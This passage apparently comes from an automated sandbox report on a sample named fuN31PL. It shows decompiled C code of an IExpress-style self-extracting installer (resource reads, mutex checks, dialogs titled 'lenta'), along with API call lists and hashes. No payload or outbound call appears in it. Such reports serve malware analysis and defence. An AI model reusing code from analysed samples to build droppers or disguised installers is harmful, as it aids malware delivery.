                                                                                                                                                                                                                                              						_t63 = 0x4c0;
                                                                                                                                                                                                                                              						L9:
                                                                                                                                                                                                                                              						E001A44B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              						_push(0);
                                                                                                                                                                                                                                              						goto L38;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t63 = 0x4b1;
                                                                                                                                                                                                                                              					goto L9;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return 0;
                                                                                                                                                                                                                                              			}

























                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a33b4
                                                                                                                                                                                                                                              0x001a3398
                                                                                                                                                                                                                                              0x001a3399
                                                                                                                                                                                                                                              0x001a339b
                                                                                                                                                                                                                                              0x001a339c
                                                                                                                                                                                                                                              0x001a339d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a339d
                                                                                                                                                                                                                                              0x001a334c
                                                                                                                                                                                                                                              0x001a3351
                                                                                                                                                                                                                                              0x001a3354
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a335c
                                                                                                                                                                                                                                              0x001a3362
                                                                                                                                                                                                                                              0x001a3364
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3366
                                                                                                                                                                                                                                              0x001a3367
                                                                                                                                                                                                                                              0x001a3369
                                                                                                                                                                                                                                              0x001a336a
                                                                                                                                                                                                                                              0x001a336b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a336b
                                                                                                                                                                                                                                              0x001a331c
                                                                                                                                                                                                                                              0x001a3323
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3329
                                                                                                                                                                                                                                              0x001a332b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a332b
                                                                                                                                                                                                                                              0x001a324c
                                                                                                                                                                                                                                              0x001a324c
                                                                                                                                                                                                                                              0x001a324f
                                                                                                                                                                                                                                              0x001a32c8
                                                                                                                                                                                                                                              0x001a32ce
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a32ce
                                                                                                                                                                                                                                              0x001a3251
                                                                                                                                                                                                                                              0x001a3256
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3271
                                                                                                                                                                                                                                              0x001a3277
                                                                                                                                                                                                                                              0x001a3279
                                                                                                                                                                                                                                              0x001a3298
                                                                                                                                                                                                                                              0x001a329d
                                                                                                                                                                                                                                              0x001a329f
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a32b0
                                                                                                                                                                                                                                              0x001a32b6
                                                                                                                                                                                                                                              0x001a32b8
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a32be
                                                                                                                                                                                                                                              0x001a3280
                                                                                                                                                                                                                                              0x001a3289
                                                                                                                                                                                                                                              0x001a328e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a328e
                                                                                                                                                                                                                                              0x001a327b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a327b
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LoadStringA.USER32(000003E8,001A8598,00000200), ref: 001A3271
                                                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 001A33E2
                                                                                                                                                                                                                                              • SetWindowTextA.USER32(?,lenta), ref: 001A33F7
                                                                                                                                                                                                                                              • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 001A3410
                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000836), ref: 001A3426
                                                                                                                                                                                                                                              • EnableWindow.USER32(00000000), ref: 001A342D
                                                                                                                                                                                                                                              • EndDialog.USER32(?,00000000), ref: 001A343F
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$lenta
                                                                                                                                                                                                                                              • API String ID: 2418873061-7669773
                                                                                                                                                                                                                                              • Opcode ID: 6f1e707b1d66fc8edb1370c11202f6f676bda07b5d676c69775f01709fbe6ad6
                                                                                                                                                                                                                                              • Instruction ID: 082b14d86c2bafe5f8bfd9ad8290dc12797105e8360f112888d4e43fde9e126a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f1e707b1d66fc8edb1370c11202f6f676bda07b5d676c69775f01709fbe6ad6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3351797C3842407BEB225B355C8DF7B2E5DEF9BB54F504029F226D65C1CBA48E82D261
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                                                                                              			E001A2CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t13;
                                                                                                                                                                                                                                              				void* _t20;
                                                                                                                                                                                                                                              				void* _t23;
                                                                                                                                                                                                                                              				void* _t27;
                                                                                                                                                                                                                                              				struct HRSRC__* _t31;
                                                                                                                                                                                                                                              				intOrPtr _t33;
                                                                                                                                                                                                                                              				void* _t43;
                                                                                                                                                                                                                                              				void* _t48;
                                                                                                                                                                                                                                              				signed int _t65;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t66;
                                                                                                                                                                                                                                              				signed int _t67;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t13 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				_v8 = _t13 ^ _t67;
                                                                                                                                                                                                                                              				_t65 = 0;
                                                                                                                                                                                                                                              				_t66 = __ecx;
                                                                                                                                                                                                                                              				_t48 = __edx;
                                                                                                                                                                                                                                              				 *0x1a9a3c = __ecx;
                                                                                                                                                                                                                                              				memset(0x1a9140, 0, 0x8fc);
                                                                                                                                                                                                                                              				memset(0x1a8a20, 0, 0x32c);
                                                                                                                                                                                                                                              				memset(0x1a88c0, 0, 0x104);
                                                                                                                                                                                                                                              				 *0x1a93ec = 1;
                                                                                                                                                                                                                                              				_t20 = E001A468F("TITLE", 0x1a9154, 0x7f);
                                                                                                                                                                                                                                              				if(_t20 == 0 || _t20 > 0x80) {
                                                                                                                                                                                                                                              					_t64 = 0x4b1;
                                                                                                                                                                                                                                              					goto L32;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t27 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                                                              					 *0x1a858c = _t27;
                                                                                                                                                                                                                                              					SetEvent(_t27);
                                                                                                                                                                                                                                              					_t64 = 0x1a9a34;
                                                                                                                                                                                                                                              					if(E001A468F("EXTRACTOPT", 0x1a9a34, 4) != 0) {
                                                                                                                                                                                                                                              						if(( *0x1a9a34 & 0x000000c0) == 0) {
                                                                                                                                                                                                                                              							L12:
                                                                                                                                                                                                                                              							 *0x1a9120 =  *0x1a9120 & _t65;
                                                                                                                                                                                                                                              							if(E001A5C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                                                                                                                                                                                              								if( *0x1a8a3a == 0) {
                                                                                                                                                                                                                                              									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                                                                                                                                                                                              									if(_t31 != 0) {
                                                                                                                                                                                                                                              										_t65 = LoadResource(_t66, _t31);
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									if( *0x1a8184 != 0) {
                                                                                                                                                                                                                                              										__imp__#17();
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									if( *0x1a8a24 == 0) {
                                                                                                                                                                                                                                              										_t57 = _t65;
                                                                                                                                                                                                                                              										if(E001A36EE(_t65) == 0) {
                                                                                                                                                                                                                                              											goto L33;
                                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                                              											_t33 =  *0x1a9a40; // 0x3
                                                                                                                                                                                                                                              											_t48 = 1;
                                                                                                                                                                                                                                              											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                                                                                                                                                                                              												if(( *0x1a9a34 & 0x00000100) == 0 || ( *0x1a8a38 & 0x00000001) != 0 || E001A18A3(_t64, _t66) != 0) {
                                                                                                                                                                                                                                              													goto L30;
                                                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                                                              													_t64 = 0x7d6;
                                                                                                                                                                                                                                              													if(E001A6517(_t57, 0x7d6, _t34, E001A19E0, 0x547, 0x83e) != 0x83d) {
                                                                                                                                                                                                                                              														goto L33;
                                                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                                                              														goto L30;
                                                                                                                                                                                                                                              													}
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                              												L30:
                                                                                                                                                                                                                                              												_t23 = _t48;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										_t23 = 1;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									E001A2390(0x1a8a3a);
                                                                                                                                                                                                                                              									goto L33;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_t64 = 0x520;
                                                                                                                                                                                                                                              								L32:
                                                                                                                                                                                                                                              								E001A44B9(0, _t64, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              								goto L33;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t64 =  &_v268;
                                                                                                                                                                                                                                              							if(E001A468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                              								goto L3;
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                                                                                                                                                                                              								 *0x1a8588 = _t43;
                                                                                                                                                                                                                                              								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                                                                                                                                                                                              									goto L12;
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									if(( *0x1a9a34 & 0x00000080) == 0) {
                                                                                                                                                                                                                                              										_t64 = 0x524;
                                                                                                                                                                                                                                              										if(E001A44B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                                                                                                                                                                                              											goto L12;
                                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                                              											goto L11;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										_t64 = 0x54b;
                                                                                                                                                                                                                                              										E001A44B9(0, 0x54b, "lenta", 0, 0x10, 0);
                                                                                                                                                                                                                                              										L11:
                                                                                                                                                                                                                                              										CloseHandle( *0x1a8588);
                                                                                                                                                                                                                                              										 *0x1a9124 = 0x800700b7;
                                                                                                                                                                                                                                              										goto L33;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						L3:
                                                                                                                                                                                                                                              						_t64 = 0x4b1;
                                                                                                                                                                                                                                              						E001A44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              						 *0x1a9124 = 0x80070714;
                                                                                                                                                                                                                                              						L33:
                                                                                                                                                                                                                                              						_t23 = 0;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E001A6CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                                                                                                                                                                                              			}



















                                                                                                                                                                                                                                              0x001a2e1f
                                                                                                                                                                                                                                              0x001a2e2e
                                                                                                                                                                                                                                              0x001a2e41
                                                                                                                                                                                                                                              0x001a2e5a
                                                                                                                                                                                                                                              0x001a2e62
                                                                                                                                                                                                                                              0x001a2e6c
                                                                                                                                                                                                                                              0x001a2e6c
                                                                                                                                                                                                                                              0x001a2e75
                                                                                                                                                                                                                                              0x001a2e77
                                                                                                                                                                                                                                              0x001a2e77
                                                                                                                                                                                                                                              0x001a2e84
                                                                                                                                                                                                                                              0x001a2e8b
                                                                                                                                                                                                                                              0x001a2e94
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a2e96
                                                                                                                                                                                                                                              0x001a2e96
                                                                                                                                                                                                                                              0x001a2e9e
                                                                                                                                                                                                                                              0x001a2ea2
                                                                                                                                                                                                                                              0x001a2eba
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a2ece
                                                                                                                                                                                                                                              0x001a2ede
                                                                                                                                                                                                                                              0x001a2eed
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a2eed
                                                                                                                                                                                                                                              0x001a2eef
                                                                                                                                                                                                                                              0x001a2eef
                                                                                                                                                                                                                                              0x001a2eef
                                                                                                                                                                                                                                              0x001a2eef
                                                                                                                                                                                                                                              0x001a2ea2
                                                                                                                                                                                                                                              0x001a2e86
                                                                                                                                                                                                                                              0x001a2e88
                                                                                                                                                                                                                                              0x001a2e88
                                                                                                                                                                                                                                              0x001a2e43
                                                                                                                                                                                                                                              0x001a2e48
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a2e48
                                                                                                                                                                                                                                              0x001a2e30
                                                                                                                                                                                                                                              0x001a2e30
                                                                                                                                                                                                                                              0x001a2ef8
                                                                                                                                                                                                                                              0x001a2f01
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a2f01
                                                                                                                                                                                                                                              0x001a2d8a
                                                                                                                                                                                                                                              0x001a2d8f
                                                                                                                                                                                                                                              0x001a2da1
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a2da3
                                                                                                                                                                                                                                              0x001a2dae
                                                                                                                                                                                                                                              0x001a2db4
                                                                                                                                                                                                                                              0x001a2dbb
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a2dca
                                                                                                                                                                                                                                              0x001a2dd3
                                                                                                                                                                                                                                              0x001a2df5
                                                                                                                                                                                                                                              0x001a2e02
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a2dd5
                                                                                                                                                                                                                                              0x001a2dde
                                                                                                                                                                                                                                              0x001a2de3
                                                                                                                                                                                                                                              0x001a2e04
                                                                                                                                                                                                                                              0x001a2e0a
                                                                                                                                                                                                                                              0x001a2e10
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a2e10
                                                                                                                                                                                                                                              0x001a2dd3
                                                                                                                                                                                                                                              0x001a2dbb
                                                                                                                                                                                                                                              0x001a2da1
                                                                                                                                                                                                                                              0x001a2d5b
                                                                                                                                                                                                                                              0x001a2d5b
                                                                                                                                                                                                                                              0x001a2d5d
                                                                                                                                                                                                                                              0x001a2d69
                                                                                                                                                                                                                                              0x001a2d6e
                                                                                                                                                                                                                                              0x001a2f06
                                                                                                                                                                                                                                              0x001a2f06
                                                                                                                                                                                                                                              0x001a2f06
                                                                                                                                                                                                                                              0x001a2d59
                                                                                                                                                                                                                                              0x001a2f18

APIs
• memset.MSVCRT ref: 001A2CD9
• memset.MSVCRT ref: 001A2CE9
• memset.MSVCRT ref: 001A2CF9
  • Part of subcall function 001A468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001A46A0
  • Part of subcall function 001A468F: SizeofResource.KERNEL32(00000000,00000000,?,001A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46A9
  • Part of subcall function 001A468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001A46C3
  • Part of subcall function 001A468F: LoadResource.KERNEL32(00000000,00000000,?,001A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46CC
  • Part of subcall function 001A468F: LockResource.KERNEL32(00000000,?,001A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46D3
  • Part of subcall function 001A468F: memcpy_s.MSVCRT ref: 001A46E5
  • Part of subcall function 001A468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46EF
• CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001A2D34
• SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 001A2D40
• CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 001A2DAE
• GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 001A2DBD
• CloseHandle.KERNEL32(lenta,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 001A2E0A
  • Part of subcall function 001A44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 001A4518
  • Part of subcall function 001A44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 001A4554
Strings
Memory Dump Source
• Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
• Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
Similarity
• API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
• String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$lenta
• API String ID: 1002816675-2993962200
• Opcode ID: dc2cd8894d74ff0bc6032dd80cb8a25895f418835d65dc97279982be9f9ceab0
• Instruction ID: cfff6adc6a482d73a10e1518ef3d120c2c765bd65080257c972417674824228d
• Opcode Fuzzy Hash: dc2cd8894d74ff0bc6032dd80cb8a25895f418835d65dc97279982be9f9ceab0
• Instruction Fuzzy Hash: 325107BC744301ABE725AB3C9D4AB7B3699EB97710F14403AF941D69D1EBB88CC1C621
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 81%
                                                                                                                                                                                                                                              			E001A34F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                                                              				void* _t9;
                                                                                                                                                                                                                                              				void* _t12;
                                                                                                                                                                                                                                              				void* _t13;
                                                                                                                                                                                                                                              				void* _t17;
                                                                                                                                                                                                                                              				void* _t23;
                                                                                                                                                                                                                                              				void* _t25;
                                                                                                                                                                                                                                              				struct HWND__* _t35;
                                                                                                                                                                                                                                              				struct HWND__* _t38;
                                                                                                                                                                                                                                              				void* _t39;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t9 = _a8 - 0x10;
                                                                                                                                                                                                                                              				if(_t9 == 0) {
                                                                                                                                                                                                                                              					__eflags = 1;
                                                                                                                                                                                                                                              					L19:
                                                                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                                                                              					 *0x1a91d8 = 1;
                                                                                                                                                                                                                                              					L20:
                                                                                                                                                                                                                                              					_push(_a4);
                                                                                                                                                                                                                                              					L21:
                                                                                                                                                                                                                                              					EndDialog();
                                                                                                                                                                                                                                              					L22:
                                                                                                                                                                                                                                              					return 1;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_push(1);
                                                                                                                                                                                                                                              				_pop(1);
                                                                                                                                                                                                                                              				_t12 = _t9 - 0xf2;
                                                                                                                                                                                                                                              				if(_t12 == 0) {
                                                                                                                                                                                                                                              					__eflags = _a12 - 0x1b;
                                                                                                                                                                                                                                              					if(_a12 != 0x1b) {
                                                                                                                                                                                                                                              						goto L22;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					goto L19;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t13 = _t12 - 0xe;
                                                                                                                                                                                                                                              				if(_t13 == 0) {
                                                                                                                                                                                                                                              					_t35 = _a4;
                                                                                                                                                                                                                                              					 *0x1a8584 = _t35;
                                                                                                                                                                                                                                              					E001A43D0(_t35, GetDesktopWindow());
                                                                                                                                                                                                                                              					__eflags =  *0x1a8184; // 0x1
                                                                                                                                                                                                                                              					if(__eflags != 0) {
                                                                                                                                                                                                                                              						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                                                                                                                                                                                              						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					SetWindowTextA(_t35, "lenta");
                                                                                                                                                                                                                                              					_t17 = CreateThread(0, 0, E001A4FE0, 0, 0, 0x1a8798);
                                                                                                                                                                                                                                              					 *0x1a879c = _t17;
                                                                                                                                                                                                                                              					__eflags = _t17;
                                                                                                                                                                                                                                              					if(_t17 != 0) {
                                                                                                                                                                                                                                              						goto L22;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						E001A44B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              						_push(0);
                                                                                                                                                                                                                                              						_push(_t35);
                                                                                                                                                                                                                                              						goto L21;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t23 = _t13 - 1;
                                                                                                                                                                                                                                              				if(_t23 == 0) {
                                                                                                                                                                                                                                              					__eflags = _a12 - 2;
                                                                                                                                                                                                                                              					if(_a12 != 2) {
                                                                                                                                                                                                                                              						goto L22;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					ResetEvent( *0x1a858c);
                                                                                                                                                                                                                                              					_t38 =  *0x1a8584; // 0x0
                                                                                                                                                                                                                                              					_t25 = E001A44B9(_t38, 0x4b2, 0x1a1140, 0, 0x20, 4);
                                                                                                                                                                                                                                              					__eflags = _t25 - 6;
                                                                                                                                                                                                                                              					if(_t25 == 6) {
                                                                                                                                                                                                                                              						L11:
                                                                                                                                                                                                                                              						 *0x1a91d8 = 1;
                                                                                                                                                                                                                                              						SetEvent( *0x1a858c);
                                                                                                                                                                                                                                              						_t39 =  *0x1a879c; // 0x0
                                                                                                                                                                                                                                              						E001A3680(_t39);
                                                                                                                                                                                                                                              						_push(0);
                                                                                                                                                                                                                                              						goto L20;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					__eflags = _t25 - 1;
                                                                                                                                                                                                                                              					if(_t25 == 1) {
                                                                                                                                                                                                                                              						goto L11;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					SetEvent( *0x1a858c);
                                                                                                                                                                                                                                              					goto L22;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(_t23 == 0xe90) {
                                                                                                                                                                                                                                              					TerminateThread( *0x1a879c, 0);
                                                                                                                                                                                                                                              					EndDialog(_a4, _a12);
                                                                                                                                                                                                                                              					return 1;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return 0;
                                                                                                                                                                                                                                              			}












                                                                                                                                                                                                                                              0x001a3617
                                                                                                                                                                                                                                              0x001a3623
                                                                                                                                                                                                                                              0x001a3637
                                                                                                                                                                                                                                              0x001a363d
                                                                                                                                                                                                                                              0x001a3642
                                                                                                                                                                                                                                              0x001a3644
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3646
                                                                                                                                                                                                                                              0x001a3652
                                                                                                                                                                                                                                              0x001a3657
                                                                                                                                                                                                                                              0x001a3658
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3658
                                                                                                                                                                                                                                              0x001a3644
                                                                                                                                                                                                                                              0x001a351b
                                                                                                                                                                                                                                              0x001a351d
                                                                                                                                                                                                                                              0x001a354f
                                                                                                                                                                                                                                              0x001a3553
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a355f
                                                                                                                                                                                                                                              0x001a3565
                                                                                                                                                                                                                                              0x001a357c
                                                                                                                                                                                                                                              0x001a3581
                                                                                                                                                                                                                                              0x001a3584
                                                                                                                                                                                                                                              0x001a359b
                                                                                                                                                                                                                                              0x001a35a1
                                                                                                                                                                                                                                              0x001a35a7
                                                                                                                                                                                                                                              0x001a35ad
                                                                                                                                                                                                                                              0x001a35b3
                                                                                                                                                                                                                                              0x001a35b8
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a35b8
                                                                                                                                                                                                                                              0x001a3586
                                                                                                                                                                                                                                              0x001a3588
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3590
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3590
                                                                                                                                                                                                                                              0x001a3524
                                                                                                                                                                                                                                              0x001a3535
                                                                                                                                                                                                                                              0x001a3541
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3549
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • TerminateThread.KERNEL32(00000000), ref: 001A3535
                                                                                                                                                                                                                                              • EndDialog.USER32(?,?), ref: 001A3541
                                                                                                                                                                                                                                              • ResetEvent.KERNEL32 ref: 001A355F
                                                                                                                                                                                                                                              • SetEvent.KERNEL32(001A1140,00000000,00000020,00000004), ref: 001A3590
                                                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 001A35C7
                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,0000083B), ref: 001A35F1
                                                                                                                                                                                                                                              • SendMessageA.USER32(00000000), ref: 001A35F8
                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,0000083B), ref: 001A3610
                                                                                                                                                                                                                                              • SendMessageA.USER32(00000000), ref: 001A3617
                                                                                                                                                                                                                                              • SetWindowTextA.USER32(?,lenta), ref: 001A3623
                                                                                                                                                                                                                                              • CreateThread.KERNEL32 ref: 001A3637
                                                                                                                                                                                                                                              • EndDialog.USER32(?,00000000), ref: 001A3671
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                                                              • String ID: lenta
                                                                                                                                                                                                                                              • API String ID: 2406144884-2780258678
                                                                                                                                                                                                                                              • Opcode ID: a9b518e1566c04becb496b705b4a72a58ad3b68166851cc9bfd5753256ae0800
                                                                                                                                                                                                                                              • Instruction ID: 079381798b9f378346e4efc11e76ab526377cec093a622dc481752d0759cf812
